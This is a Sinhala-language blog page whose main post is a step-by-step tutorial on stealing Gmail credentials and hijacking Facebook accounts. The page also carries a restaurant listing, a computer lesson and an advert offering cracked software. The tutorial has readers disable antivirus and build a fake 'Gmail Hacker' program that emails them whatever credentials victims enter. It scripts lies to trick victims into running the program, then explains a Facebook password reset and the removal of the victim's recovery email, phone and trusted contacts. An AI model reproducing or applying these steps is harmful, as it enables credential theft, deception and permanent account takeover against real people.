WELCOME TO UD TRiCKZONE(Pvt)Limited

Welcome to our new WEBSITE [UD TRiCKZONE] WE are kindly invited to you join our WEBSITE and Follow it. Thanks for read this Written by ADMiN OF UD TRiCKZONE

Photoshop Top Secret Pack

ෆොටෝශොප් මායා ලෝකයට පිවිසීමට ඔබට අත්වැල් සපයන දැනට ලොව තිබෙන විශිෂ්ඨතම ටියුටෝරියල් පැක් එක මෙතනින් ගන්න.

Showing posts with label HOME. Show all posts
Showing posts with label HOME. Show all posts

Monday, October 28, 2013

SIGIRI SRI LANKAN RESTAURANT AND TAKEAWAY




Sigiri serves very authentic Sri Lankan cuisine, complemented by warm service in a cosy atmosphere. You'll love the hot curries made with roasted spices, packed full of flavour. The menu is delightfully varied, with many culinary influences from over the centuries including Portuguese, Dutch, English, South Indian and Malay.


{CLICK HERE TO GO >>>> SIGIRI SRI LANKAN RESTAURANT  
 

338 High Street Northcote Victoria 3070 Australia


Phone: - +61 3 94826114 -----
 Fax: - +61 3 94826117--------


Open 6pm to 11pm Tuesday to Sunday, fully licensed.

SEE WHATS NEW >>> SEE WAHTS NEW <<<

Friday, October 25, 2013

Gmail Hack කරලා , Facebook Hack කරමු... ( 100% Working ) [ How To Hack Gmail Or Facebook Accounts. ]

  සුභ දවසක් කස්ටියටම !!! කොහොමද ඉතින්? සනීපෙන් එහෙම ඉන්නවද? ඔන්න මට නම් මාරාන්තික ලෙඩක් හැදිලා...බෙහෙත් නැතිලු මේකට.... මට මේ facebook මේනියාවක් හැදිලා අෆ්ෆා !!! සමහර අය අහනවා, උබ පැය 24 ම fb එකේ මොනා කරනවද කියලා..මොකද ඉතින් මට මල් කඩන්න කෙල්ලෙක් වත් නෑනේ...ඇත්තටම මම දන්නෙත් නෑ fb එකේ මොනා කරනවද කියලා...fb ආවම වෙලාව යනවා දැනෙන්නෙ නෑ.... හරි හරි දැන් බයිලා ගැහුවා ඇති. මම හැමදාම කස්ටියට එකේක විදියේ tricks දෙන නිසා අද හිතුවා වෙනසකටත් එක්ක පොඩි hacking වැඩ කෑල්ලක් කියලා දෙන්න !! වරදක් නෑනේ...කවුරුත් කැමතිනේ... අද මට ගොඩක් සතුටුයි. මොකද කියනවා නම්, මම දැන් මේ දාපු post එක තමයි, අපේ blog එකේ 100 වෙනි post එකඉතින් මට හිතුනා 100 වෙනි post එකට, අභිමානවත් , සුපිරි වැඩ කෑල්ලක් තියෙන post එකක් දැම්මොත් හොදයි කියලා. ඒකයි මම අද ඔයාලට මේ hacking වැඩ කෑල්ලක් කියලා දෙන්න හදන්නේ.....
මෙහෙමයි අද කියන්න යන්නේ එසේ මෙසේ hacking වැඩ කෑල්ලක් නෙවෙයි.මේක ඇවිල්ල දැනට ලංකාවේ පළමු වතාවට web site එකක ප්‍රදර්ශනය කරන hacking වැඩක්. මොකද, කස්ටිය hack කරන්න දැනගත්තට තවත් කෙනෙක්ට කියලා දෙන්න කැමති නෑනේ... එක නිසා ගොඩක් දෙනෙක් hack කරන්න දන්නේ නෑ...ඒ වුනාට ඔන්නමගේ ලග නම් ඒ වගේ වැඩ නෑ හොදද... හරි දැන් මාතෘකාවට බහිමුකො...

මම අද කියන්නේ Gmail එකක් Hack කරලා, ඒකෙන් Facebook Hack කරන විදියයි. සමහර විට ඔයාලා දැනටමත් fb hack කරන විධි දන්නවා ඇති. ඔය Keylogging , physhing , cookie stealing වගේ ඒවා.... ඒත් ඔය හැම එකක්ම වගේ 100%ක් සාර්ථකත් නෑ වගේම ගොඩක් අමාරුයි.... මම අද කියන්නේ පොඩි
software එකක් යොදාගෙන සරල ව සහ ලේසියෙන් ම Gmail හා Facebook Hack කරන විදියයි. 100%ක් සාර්ථකයි. වගකීමෙන් යුතුව කියන්නේ.... හැබැයි හොදට මතක තියාගන්න, මේ විදියට fb hack කරන්න පුළුවන්, ඔයාලගේ හතුරා gmail එකක් fb email එක විදියට පාවිච්චි කරනවා නම් විතරයි. කස්ටියට මුලින් ම කියන්න ඕන, මේ post එක ටිකක් දිගයි. මොකද කස්ටියට තේරෙන්න, සරල ව කියන්න ඕන නිසා post එක ටිකක් දිගයි. ඒක නිසා ඉවසීමෙන් කියවන්න....



ඔන්න එහෙනම් කස්ටිය වැඩේට ලෑස්ති වෙන්නකෝ... අපි එහෙනම් මුලින් ම Gmail එක hack කරලා ඉමු...
මම කලිනුත් කිව්වනේ මේ වැඩේට පොඩි soft එකක් උදවු වෙනවා කියලා, එහෙනම් ඉස්සෙල්ලම අපි ඒක download කරගෙන ඉමු. මුලින් ම ඔයාලගේ Virus Guard එක off කරන්න. මොකද මේ soft එක සමහර විට Virus Guard එකෙන් remove කරන්න පුළුවන්. හරි එහෙනම් Virus Guard එක off කලානේ? ඔන්න දැන් එහෙනම් මේක Download කරගන්න.
 DOWNLOAD

දැන් ඕක extract කරගන්නකො. ඕකේ ඇති, Gmail Hacker Builder.exe කියලා එකක්. අන්න ඒක open කරන්නකෝ. දැන් ඔතන තියෙනවා, Your Gmail Address කියලා එකක්. අන්න එතනට ඔයාලගේ ඇත්ත gmail address එක දෙන්න. කෝකටත් එක්ක කියලා ඔයාලට එච්චරම වැදගත් නැති gmail address එකක්, මේකට පාවිච්චි කලොත් හොදයි. මොකද නිකමට වත් ඔයාලගේ gmail එකත් hack වුනොත් නේද?? 

සැ.යු :- මෙහිදී ඔබ විසින් Gmail Hacker Builder.exe වෙත ලබාදෙන ඔබගේ සත්‍ය Gmail Address එක සහ එහි Password එක කිසිදු ආකාරයකින් මට නොලැබෙන බව කරුණාවෙන් සලකන්න. ඔබට යම්කිසි සැකයක් ඒ පිලිබදව ඇත්නම්, අලුතින් Gmail account එකක් සාදා, එහි Gmail Address එක සහ Password එක Gmail Hacker Builder.exe වෙත ලබා දීමට කටයුතු කරන්න. මෙය මා විසින් සාදන ලද හෝ මට, ඔබලාගේ Gmail Address සහ එහි Passwords ලබා ගැනීම පිණිස පළ කළ post එකක් හෝ නොවන බවට කරුණාවෙන් දන්වා සිටිමි !!

හරි එහෙනම් මම Your Gmail Address කියන තැන මගේ   gmail address එක type කරනවා මෙහෙම iloveyou@gmail.com ඔයාලත් ඔයාලගේ gmail address එක type කරන්න ඔතන. දැන් Your Gmail Password කියන තැන ඔයාලා දැන් type කරපු gmail එකේ paasword එක type කරලා Build කියන එක click කරන්න. දැන් පොඩි message එකක් ඒවි. ඒක OK කරලා දාන්න. දැන් Gmail Hacker Builder.exe කියන එක close කරන්න. දැන් බලන්න ඔතන අලුතින් file එකක් හැදිලා ඇති Gmail Hacker.exe කියලා. දැන් නිකමට වගේ ඕක open කරන්නකෝ. open කළාම මෙන්න මේ වගේ ඇත්තේ.
[ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]



දැන් අපිට කාගෙ හරි Gmail එකක් hackකරන්න ඕන නම් කරන්න ඕන මෙච්චරයි..... මේක තමයි මේ post එකේ ගොඩක් වැදගත් ම පියවර. මොකද කියනවා නම් මෙතැනදී තමයි, ඔයාලගේ හැකියාව ඕන වෙන්නේ.
දැන් කස්ටිය කල්පනා කරනවා ඇති ඒ මොකටද කියලා. මේකනේ, දැන් ඔය Gmail Hacker.exe කියන එක දැක්කම ඔයාලාට පේනවනේ ඒකෙන් Gmail Hack කරන්න පුළුවන් කියලා. ඒත් ඇත්තටම ඕකෙන් Hack කරන්න බෑ. ඒ මොකද කියලා තව ටිකකින් කියන්නම්. ඔයාලට කාගෙ හරි Gmail එකක් hackකරන්න ඕන නම්, මෙන්න මේ Gmail Hacker.exe කියන එක, මොකක් හරි විදියකින් ඔයාලගේ හතුරට දීලා, ඕක try කරලා බලන්න කියලා කියන්න ඕන. ඔයාලගේ හතුරා fb ඉන්න කෙනෙක් නම්, ඔයාලගේ fb account එකෙන් හරි fake account එකකින් හරි, අන්න ඒ කෙනාට මේ file එක යවන්න. මේක යවලා නිකන් ඉන්න එපා. මේක ගැන පොඩි විස්තරයකුත් කියන්න එයාට මෙන්න මේ වගේ, මචෝ මට පට්ට gmail hacker එකක් set වුනා, එක පට්ටයි බං. මාත් try කළා. 100%ක් සාර්ථකයි බං. දැනට gmail 3ක්ම මම hack කළා. කොහොමද මගේ වැඩ?? උබ ඉතින් මගෙත් හොද යාලුවෙක් නිසයි මම මේ software එක උබට දෙන්නේ. උබත් try කරලා බලන්න. කාටවත් දෙන්න එපා හොදද කොල්ලෝ. නැත්තම් උනුත් අපේ ඒවා hack කරාවි. එහෙනම් ඔන්න try කරලා බලන්න කොල්ලෝ.... කොහොමද ඒක ?? අන්න ඒ වගේ මොකක් හරි බොරුවක් කියලා, ඒ කෙනාව අන්දන්න ඕන. ඔයාලට ඉතින් බොරු කියන විදිය මම අමුතුවෙන් කියන්න ඕන නෑනේ. කස්ටිය ඉතින් බොරු කියලා කප් ගහලත් ඇතිනේ...හරි කොහොමෙන් හරි ඔයාලගේ හතුරව ගොනාට අන්දලා මේක එයාලට දීලා කියන්න try කරලා බලන්න කියලා...ඔයාලට තව ඕන නම් පුළුවන් මේ Gmail Hacker.exe කියන file එක facebook group වල එහෙමත් share කරන්න. එතකොට ඕක දකින අයත් try කරලා බලාවිනේ.

හරි, ඔයාලා දැන් මෙච්චර වෙලාවක් ගිරවා වගේ මම කියපු දේවල් කලාට, ඒ කරපුවයින් මොනා වෙනවද කියලා වත් දන්නේ නෑනේ...ඒක නිසා දැන් මම ඒ ගැන කියන්නම්....දැන් ඔයාලා Gmail Hacker.exe එක open කරපු නිසා දකින්න ඇතිනේ ඒක මොන වගේද කියලා. මෙහෙමයි, අපි ඔන්න ඕකෙන් තමයි තව කෙනෙක්ගේ Gmail එකක් Hack කරන්නේ. Gmail Hacker Builder.exe කියන එකට, අපි අපේ Gmail එකයි, ඒකෙ password එකයි දුන්නා. ඒවා දුන්නම තමයි Gmail Hacker.exe එක හැදුනේ. මේ Gmail Hacker.exe කියන්නේ මොකක්ද කියලා හරියටම කිව්වොත්, මේකත් keylogger වර්ගයක්. ඒත් මේකෙන් වෙන්නේ, Gmail Hacker.exe කියන එක කවුරු හරි පාවිච්චි කරනවා නම්, ඒ කිව්වේ , Gmail Hacker.exe කියන එකේ, Your Gmail Address with "@GMail.com"කියන තැන තමන්ගේ email එක,
Your Gmail Password කියන තැන තමන්ගේ password එක, Your Victims Gmail Address with "@GMail.com" කියන තැන හතුරාගේ email එක වගේ ඒවා type කරලාHack Them කියන එක click කළාම , අන්න ඒ විස්තර හැම එකක්ම record වෙනවා. දැන් ඔයාගේ ඇත්තම හතුරා, මේ විදියට විස්තර ටික ඔක්කොම type කරලා, Hack Them කියන එක click කළාම, එයාට පොඩි error message එකක් එනවා මේ විදියේ...එතකොට ඕන නම් එයා තව දෙපාරක්, තුන්පාරක් try කරාවි. ඒත් කොච්චර try කලත්, ඔය error message එකම තමයි එන්නේ.
[ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]



පස්සේ මේ විදියට record වෙච්ච, ඔයාගේ ඇත්ත හතුරාගේ විස්තර ටික, අර ඔයා මුලින්ම ඔයාලගේ ඇත්ත email address එකක් දුන්න මතකද? අන්න ඒ email එකට mail එකකින් එනවා. මම තව ටිකක් හොදට මේක තේරුම් කරලා දෙන්නම් මේ විදියට. ඔයාලා හිතන්නකෝ මම තමයි ඔයාලගේ හතුරා, ඔන්න මාව ඔයාලා ගොනාට අන්දලා මට මේ file එක දුන්න කියලාඉතින් මං ඔන්න ඒක try කරලා බලනවා. මම මෙන්න මේ විදියටGmail Hacker.exe කියන එකට අවශ්‍ය විස්තර ටික දෙනවා.

Your Gmail Address with "@GMail.com"  -  iloveyou@gmail.com
Your Gmail Password  -  iloveyou
Your Victims Gmail Address with "@GMail.com"  -  ihateyou@gmail.com

ඔන්න මම දැන් අර Hack Them කියන එක click කළා, මට error message එකකුත් ආවා...කවුරු වුනත්, Hack Them කියන එක click කරනකොට, එයා internet connect වෙලා ඉන්න ඕන. මොකද නැත්තම්
ඔයාලට email එකක් එන්නේ කොහොමද...ඒක නිසා එයාට මතක ඇතුව කියන්න ඕන internet connect වෙලා ඉන්න කියලා.... දැන් කස්ටියට මතකද මම කිව්වා මේ විස්තර ඔක්කොම record වෙලා, මේක හදපපු කෙනාගේ email එකට mail එකක් විදියට ඒ විස්තර එනවා කියලා. ඔන්න ඉතින් දැන් ඔයාල අර මුලින් ම දීපු ඔයාලගේ ඇත්ත email එකට log වෙන්න.
එතකොට මෙන්න මේ විදියේ email එකක් ඇවිත් තියෙනවා දකීවි.
[ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]



ඔය email එක උඩ click කරන්න. එතකොට මෙහෙම එයි.
[ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]



අන්න දැක්කා නේද? මම දීපු විස්තර ටික ඔක්කොම, ඔයාලට email එකින් ඇවිල්ලා

Username: iloveyou@gmail.com


Password: iloveyou



is trying to hack: ihateyou@gmail.com


වැඩේ කොහොමද?? දැන් එහෙනම් වැඩේ කරන විදිය තෙරුනානේ..Gmail Hacker.exe කියන file එක හතුරාට දීලා, ඔයාලගේ ඇත්ත email එකට ගිහින් බලාගෙන ඉන්න email එකක් එනකම්. පස්සේ මේ විදියට ආපු email එකේ විස්තර ටික notepad එකකට copy කරගෙන, ඔයාලගේ email එකෙන් signout වෙලා, අර notepad ඒකේ තියෙන Username සහ Password දීලා හතුරාගේ account එකට log වෙන්න.

සැ.යු :- මෙහිදී ඔබ විසින් Gmail Hacker Builder.exe වෙත ලබාදෙන ඔබගේ සත්‍ය Gmail Address එක සහ එහි Password එක කිසිදු ආකාරයකින් මට නොලැබෙන බව කරුණාවෙන් සලකන්න. ඔබට යම්කිසි සැකයක් ඒ පිලිබදව ඇත්නම්, අලුතින් Gmail account එකක් සාදා, එහි Gmail Address එක සහ Password එක Gmail Hacker Builder.exe වෙත ලබා දීමට කටයුතු කරන්න. ඒ වගේම, තමන්ට මෙය හරියාකාර ව ක්‍රියා කරනවාද යන්න දැනගැනීමට අවශ්‍ය නම්, ඔබම Gmail Hacker.exe එක open කර, එහි හිස්තැන් වලට ලබා දියයුතු විස්තර වලට, තමන්ට හිතෙන ඕනෑම බොරු විස්තර ටිකක් ලබා දී, Hack Them කියන එක click කර, ඔබ Gmail Hacker Builder.exe වෙත ලබා දුන් Gmail Address එක වෙත ගොස් බලන්න. එහි අනිවාරෙන් ම ඔබ කලින් Gmail Hacker.exe එකෙහි සදහන් කළ විස්තර සියල්ලම ඔබට email පණිවිඩයකින් ලැබී ඇති බව දකීවි. මෙය මා විසින් සාදන ලද හෝ මට ඔබලාගේ Gmail Address සහ එහි Passwords ලබා ගැනීම පිණිස පළ කළ post එකක් හෝ නොවන බවට කරුණාවෙන් දන්වා සිටිමි !!

හරි ඔන්න ඔහොම තමයි Gmail එක hack කරන්නේ. ඔයාට hack කරන්න ඕන Gmail එක විතරයි නම්, ඔයාලා දැන් hack කරපු gmail එකේ password එක account settings වලට ගිහින් වෙනස් කරගන්න. එක කරන විදිය මම මෙතැනදී කිව්වොත් post එක තව දික් වෙන නිසා එක කරන විදිය මම දැන් කියන්න යන්නේ නෑ....ඔයාලට දැන් fb ත්  hack කරන්න ඕන නම්, ඕකේ password වෙනස් කලේ නෑ කියල අවුලක් නෑ.....ඒ මොකද කියලා තව ටිකකින් තේරේවි....

ඔන්න දැන් යන්නේ, ගොඩක් වැදගත් දෙයක් කියන්නයි. මේක අදාළ fb ත්  hack කරන්න ඕන වෙච්ච අයටයි. එක නිසා හොදට අහගන්න. මෙහෙමයි, ඔයාලගේ හතුරාගේ email එකට log වුනාම, ඒකෙ inbox එකේ බලන්න facebook එකෙන් ආපු email
තියෙනවද කියලා. facebook එකෙන් ආපු email මෙන්න මේ වගේ....................
[ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]



හතුරාගේ email ඒකෙ මේ විදියේ email තියෙනවා නම්, අපිට fb hack කරන වැඩේ තවත් ලේසියි. මොකද කියනවා නම්,  facebook එකෙන් ආපු email තියෙනවා කියන්නේ, ඒ email එක තමයි ඔයාගේ හතුරා fb එකට භාවිතා කරන්නේ. එතකොට අපිට පුළුවන් Facebook එකේ Forget Password ගිහින්, මේ email එකට, fb password වෙනස් කරන link එක ගෙන්න ගන්න. හදිස්සියේ වත් හතුරාගේ email එකේ facebook එකෙන් ආපු email නැත්තම්, මෙන්න මෙහෙම කරන්න. හතුරා Gmail Hacker.exe එකෙන් hack කරන්න හැදුවම එයාට error එකක් එනවනේ. එතකොට එයා ඔයාලට කියාවි, මේක වැඩ කරන්නේ නෑ කියලා. එතකොට ඔයාල කියන්න එයාට මෙහෙම,

" තමන්ගේ email address එක type කරන්න
තියෙන තැනට, ඔයාගේ වෙන gmail address එකක් type කරලා බලන්න. මගෙත් පලවෙනි සැරේ ඔහොම වුනා. මම, අපේ gmail address එක type කරන්න ඕන තැනට gmail 3, 4ක් ම type කරලා බැලුවම තමයි හරි ගියේ." ඔන්න ඔය විදියට කිව්වම, එයා ලග තියෙන හැම gmail address එකක්ම, එයා type කරලා බලාවි. එතකොට ඔයාලට තියෙන්නේ, එයා ඒ type කරන gmail වලින් facebook එකෙන් ආපු mail තියෙන නිවැරදි gmail එක තෝරාගන්න. දැන් අන්න ඒ gmail එකට log වෙලා ඉන්න.

 ඔන්න දැන් කියන්නේ fb hack කරන විදියයි.....

ඔයාල කොහොම හරි facebook එකෙන් ආපු mail තියෙන email එක තෝරාගත්තට පස්සේ, www.facebook.com මේකට ගිහින් Forget Password කියන එක click කරන්න.
[ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]



දැන් ඔයාලට පොඩි search box එකක් තියෙන page එකක් ලැබේවි. ඔන්න ඔය search box එකේ, දැන් ඔයාල log වෙලා ඉන්න email address එක ( ඔයාලා hack කරපු හතුරාගේ gmail එක ) type කරලා, Search
 click කරන්න.
[ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]



දැන් ඔන්න, කිරිගහට ඇන්න වගේ, ඔයාලට hack කරන්න ඕන හතුරාගේ account එක ඒවි. බලන්න එයාගේ නමයි, profile picture එකයි ලස්සනට තියෙනවා. බලන්න ඔතන ඇති මෙහෙම එකක්, Email me a link to reset my password ( *********@gmail.com ) ඔහොම එකක් අනිවා තියෙනවා. අන්න ඒකට tick එකක් දාල Continue කරන්න.
[ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]



ඔන්න දැන්, ඔයාල log වෙලා ඉන්න හතුරාගේ email එකට mail එකක් ඒවි. inbox එක refresh කළාම ඒ email එක ඔයාල දකීවි. අන්න ඒ email එක උඩ click කරන්න. දැන් මෙන්න මේ වගේ එකක් ඒවි. ඔතන ලොකුවට තියෙනවා Change Password කියලා එකක්. අන්න ඒක click කරන්න.
[ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]



දැන් ඉතින් අලුතින් එන page එකේ ඔයාලට තියෙන්නේ ඔයාලා කැමති password එකක් type කරලා next කරන එක විතරයි. Password එක මතක තියාගන්න. ඔන්න facebook එක hack කළා.
ඔයා දැන් ඉන්නේ හතුරාගේ fb account එකේ. වැඩේ කොහොමද?? එලනේ..

හෝව් හෝව්.. !! ඉවරයි කියලා හිතුවට තාම ඉවර නෑ. ඔයාලා fb account එකේ password වෙනස් කළා කියලා වැඩක් වෙන්නේ නෑ. ඒ මොකද කියනවා නම්, හතුරා fb account එකට mobile phone නොම්බරයක් දාල තියේ නම් හෝ එයා trusted contacts දාල තියේ නම් හෝ, හතුරාට ලේසියෙන් ම එයාගේ account එක ආයෙමත් එයාගේ බාරයට ගන්න පුළුවන්. ඒවගේම අපි දැන් එයාගේ email එක remove කරලා අපේ email එකක් දාගන්නත් ඕන. ඒක නිසා අපි ඉස්සෙල්ලම බලමු හතුරා ගේ email එක remove කරලා අපේ email එකක් දාගන්නෙ කොහොමද කියලා.හතුරාගේ fb account එකේ දකුණු පැත්තේ උඩින් ම settings icon එක click Account Settings වලට යන්න.
[ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]

දැන් ඔතන ඇති Email කියල එකක්. අන්න ඒක click කරන්න. එතකොට පෙනේවි දැන් තියෙන email එක.
[ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]

දැන් ඔතන ඇති Add another email කියල එකක්. අන්න එකට ගිහින්, ඔයාල ලග තියෙන මිට කලින් fb එකට දීපු නැති email එකක් දෙන්න. එහෙම එකක් නැත්තම්, දැන් එකක් හදාගන්න. මොකක් හරි නමකින් හදාගන්න. ඊළගට අන්න ඒ email එක මෙතනට දෙන්න. දැන් ඔයාල email එක දීලා, fb password එකත් ගහලා save කරන්න. දැන් ඔයාලා දීපු email එකට යන්න. ඒකට confirmation mail එකක් fb එකෙන් එවලා ඇති.
[ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]

ඔන්න ඔය mail එක click කරන්න. ඕකේ facebook එකෙන් දීපු link එකක් ඇති. දැන් අන්න ඒ link එකට යන්න. ඔන්න දැන් ඔයා අලුතින් දීපු email එක fb profile එකට add කළා. දැන් ආයෙත් ඔය email කියන එක click කරලා, ඔයා දැන් අලුතින් දීපු email එකටtik එකක් දාලා password එකත් ගහලා save කරන්න. දැන් ආයෙත් ඔය email කියන එක click කරලා, අර පරණ email එක, ඒ කිව්වේ ඔයා දැන් අලුතින් දාපු email එක නෙවෙයි කලින් ඉදලම තිබුණු email එක ඉස්සරහින් තියෙන Remove කියන එක click කරලා ඒකRemove කරන්න. password ඇහුවොත් ඒකත් type කරන්න.
ඔන්න ඒක ඉවරයි.

දැන් බලමු mobile phone නොම්බරය අයින් කරන විදිය. හතුරාගේ fb account එකේ දකුණු පැත්තේ උඩින් ම settings icon එක click කරලා Account Settings වලට යන්න. දැන් වම් පැත්තේ තියෙන mobile කියන එක click කරන්න. එතකොට ඔයාලට පෙනේවි, ඔයාලගේ හතුරා fb account එකට mobile phone නොම්බරයක් දාල තියේද? නැද්ද? කියලා. දාල නැත්තම් එතන ඇත්තේ + Add a mobile phone number කියලා. එහෙම තියේ නම් කිසි අවුලක් නෑ. mobile නොම්බරයක් දාලා තියේ නම්, mobile phone නොම්බරයක් පෙනේවි. අන්න ඒක ඉස්සරහ තියෙන Remove කියන එක click කරලා ඒකRemove කරන්න. ඔන්න දැන් mobile phone ප්‍රශ්නය විසදුවා.
[ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]



දැන් බලමු Trusted Contacts කේස් එක විසදන විදිය. Trusted Contacts කියන්නේ මොකක්ද කියලා දන්නේ නැත්තම් මෙතනින් ගිහින් කියවලා බලන්න. Click Here
Trusted Contacts කියන්නේ මොකක්ද කියලා දැන් දන්නවා ඇතිනේ. එහෙනම් ඊලග පියවර විදියට Trusted Contacts වල ඉන්න කස්ටිය Remove කරමු. එකට , හතුරාගේ fb account එකේ දකුණු පැත්තේ උඩින් ම settings icon එක click කරලා Account Settings වලට යන්න. දැන් වම අත පැත්තේ ඇති Security කියලා එකක්. අන්න ඒකට යන්න. ඔතන ටිකක් යට ඇති Trusted Contacts කියලා එකක්. අන්න ඒක click කරන්න.
[ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]


දැන් ඔතන බලන්න  එකේක කට්ටිගේ photos එක්ක තුන්දෙනෙක් හෝ ඊට වැඩි ගණනක් ඉන්නවද කියලා. ඔතන කවුරුවත් ම නැත්තම්, ඔයා දැනටමත් හතුරාගේ account එක 100%ක් hack කරලා ඉවරයි. නිකමට වත් ඔතන කට්ටිය add කරලා ඉන්නවා නම්, කට්ටියට දකුණු පැත්තේ Remove All කියලා එකක් ඇති. ඒක click කරලා හැම කෙනාමRemove කරලා Save කරන්න. දැන් කස්ටියම එහෙනම් ලොකු හුස්මක් අරගන්නකෝ. ඔන්න වැඩේ අහවරයි.....
අපි 100000000% ක් ම , අපේ හතුරාගේ fb account එක hack කළා. දැන් ඉතින් එයා මොන තරම් ජගතෙක් වුනත්, එයාට කවදාවත් ම, ආයෙත් එයාගේ account එක එයාට ලබාගන්න බෑ.......ඒක ස්ථිරයි සහතිකයි, වගකීමෙන් කියනවා මම.

ඔන්න එහෙනම්, Gmail එකයි Facebook එකයි, දෙකම hack කොරලා ඉවරයි...දැන් ඉතින් ඔයාලා try කොරලා බලන්න...

හරියටම පැයකුත් විනාඩි 48යි තත්පර 23ක් මම අරගෙන තියෙනවා මේ post එක, ගේ අදහස් වලින් type කරලා ඉවර කරන්න.දැන් නම් ඇත්තටම මහන්සියි !! අෆ්ෆා ඒ වගේම නිදි මතයි.. !!
ඇඟිලි ටිකත් ගල් වෙලා වගේ රිදෙනවා මේ post එක type කරලම....කස්ටියට කියවලත් එපා වෙන්න ඇති නේද?? මොනා කරන්නද?? මට පුළුවන් උපරිම සරලව තමයි මේ කිව්වේ. ඉතින් post එක දිගයි. ඇති ඇති මං යනවා එහෙනම්. කස්ටියට ම බුදුසරණයි !! දෙවි පිහිටයි !! දුකින් වුනත් යනවා.....

ලංකාවේ පළමු වතාවට මේ වගේ Hacking වැඩක් කියලා දීලත්, තමන්ගේ අදහස් comment කරන්නේ නෑ කියන්නේ නම් ලොකු කුහක කමක් හොදද..ඒක නිසා, මේ post එක ගැන ඔයාලට හිතෙන දේ, මේකේ ගුණ අගුණ , තව මේ වගේ ඒවා ඕනද එපාද වගේ ඔයාලට හිතෙන ඔයාලගේ අදහස් comment නොකර යන්න අමතක කරන්න එපා...........

Thursday, October 24, 2013

Madura ONLINE dictionary SIHALA TO ENGLISH translator OR ENGLISH TO SINHALA translator

Madura ONLINE dictionary

 SIHALA TO ENGLISH translator OR ENGLISH TO SINHALA translator>>> 

 

Advertise with us


Advertise with us

Written By Admin on Today


ඔබට අවශ්‍ය ඕනැම​ වර්ගයක Banner දැන්වීම් සඳහා අමතන්න​.

Sri Lanka’s Leading Sinhala Language  website which provides CRACKED SOFTWARE
Site is read by Sri Lankan’s living all over world. Branding opportunities are shown below.







If you want any special space on the site please contact us.

Advertising Contact
DANUSHKA UDITH, 
Marketing - Web publishing,
Tel:  +94 71 9115426
Email:  danushkauditha@gmail.com  ( UD HYPER BEET PRODUCTIONZ )

  •  Special discounts for long term packages.
  •  Can link the ad to your company web site.
  •  Audio video advertising facility.
Note : Special discounts for long term packages.
And many more special customize packages as per your requirements.


- See more at  http://adf.ly/YvMrd

Tuesday, October 22, 2013

COMPUETER Lessons,

ආචයනය හෙවත් දත්ත තැම්පත් කිරිම හෝ ගබඩා කිරිම  (STORAGE)


ආචයනය ප්‍රධාන කොටස් දෙකකට බෙදා වෙන් කළ හැකිය.

  • ප්‍රාථමික ආචයන ඒකකය (Primary Storage)
  • ද්විතීයික ආචයන ඒකකය (Secondary Storage)
                         ප්‍රාථමික ආචයන ඒකක, අර්ධ සන්නායක (Semiconductors) භාවිත කරමින් නිෂ්පදනය කරනු ලබන අතර ද්විතීයික ආචයන ඒකක නිෂ්පදනය සඳහා චුම්භක තාක්ෂණ (Magnatic technology) හෝ ප්‍රකාශ තක්ෂණය (Optical technology) භාවිත කරනු දක්නට ලැබේ.
                        ප්‍රාථමික ආචයනයේ මූලික කාර්යය වනුයේ මධ්‍ය සැකසුම් ඒකකයට අවශ්‍ය කරනු ලබන දත්ත සැපයීම සඳහා තාවකාලික ව තැම්පත් කර තබා ගැනීම යි. ද්විතීයික ආචයනයේ මුලික කර්යය වනුයේ අනගතයට අවශ්‍ය වන දත්ත, උපදෙස් හා තොරතුරු තැම්පත් කර තබා ගැනිම යි.

පරිගණක මතකය  (Computer Memory)

       පරිගණක මතකය මූලික ආකාර 3කට බෙදා වෙන් කළ හැකිය.


පරිගණක මතකයේ ඇති ගති ලක්ෂණ සැලකිල්ලට ගෙන රූපය 03හි ආකරයට වර්ග දෙකකට වෙන් කළ හැකිය.

නෂ්‍ය මතකය (Volatile Memory)

                    නෂ්‍ය මතකයේ විශෙෂ ලක්ෂණය වන්නේ එහි තැම්පත් කර ඇති දත්ත සහ තොරතුරු පරිගණකයේ විදුලිය විසන්දි වීමත් සමග ම විනාශ වී යාමයි. ඉහතින් දක්වන ලද සසම්භාවි පිවිසුම් මතකය අයත් වන්නෙ ද මෙම නෂ්‍ය මතක වර්ගයටයි. එනම් සසම්භාවි පිවිසුම් මතකයේ තැම්පත් කර ඇති සියලු දත්ත හෝ තොරතුරු පරිගණකයේ විදුලිය විසන්ධි විමත් සමග ම විනාශ වේ.



WHAT IS MY IP

What Is My IP ® | Shows Your IP Address.

What Is My IP ® ?

This website is dedicated to helping users across the world not only locate their IP address, but perform an IP address lookup, learn how to trace email, and learn how to change IP address. Learning your own IP address is crucial for online gaming, tech support, using remote desktop connections, detecting proxies or even running an email server. We also host a forum for our users to learn and help others with IP related questions.

What Is An IP Address?

An IP address is an exclusive number online devices use to identify and communicate with each other through computer networks. This process can best be compared to how we receive mail to our home address. An IP address would be most similar to a mailing address, while the network would be compared to the town you live in. Just like our home addresses, information cannot be sent or received by devices without a specific address.

Internet Speed Test

An internet speed test will show you the results of the fastest upload and download burst rates during your internet speed test from your location to the location of the test server you choose. TCP/IP degrades over distance so choose the server closest to you when performing the internet speed test.

IP Address Lookup

